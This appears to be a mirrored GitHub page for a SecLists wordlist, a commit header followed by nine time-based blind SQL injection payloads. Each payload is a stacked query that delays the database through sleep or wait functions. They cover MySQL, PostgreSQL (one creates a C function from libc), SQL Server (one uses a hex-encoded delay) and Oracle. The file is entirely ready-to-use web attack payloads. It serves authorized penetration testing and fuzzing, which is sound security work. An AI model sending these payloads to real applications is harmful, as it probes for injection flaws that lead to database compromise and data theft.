mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-07-21 13:14:08 +00:00
049dc40465
Initial sorting created by the classifier script. Related to #1320 Closes #1011 Co-authored-by: 0xBassia <med.bassia@gmail.com> Co-authored-by: Miroslav Stampar <miroslav.stampar@gmail.com> Co-authored-by: soka <romain.dereydellet@gmail.com> Co-authored-by: Alexis Danizan <51817778+0x4144@users.noreply.github.com>
10 lines
489 B
Plaintext
10 lines
489 B
Plaintext
;SELECT SLEEP([SLEEPTIME])
|
|
;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
|
|
;SELECT PG_SLEEP([SLEEPTIME])
|
|
;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
|
|
;WAITFOR DELAY '0:0:[SLEEPTIME]'
|
|
;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
|
|
;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
|
|
;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
|
|
;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
|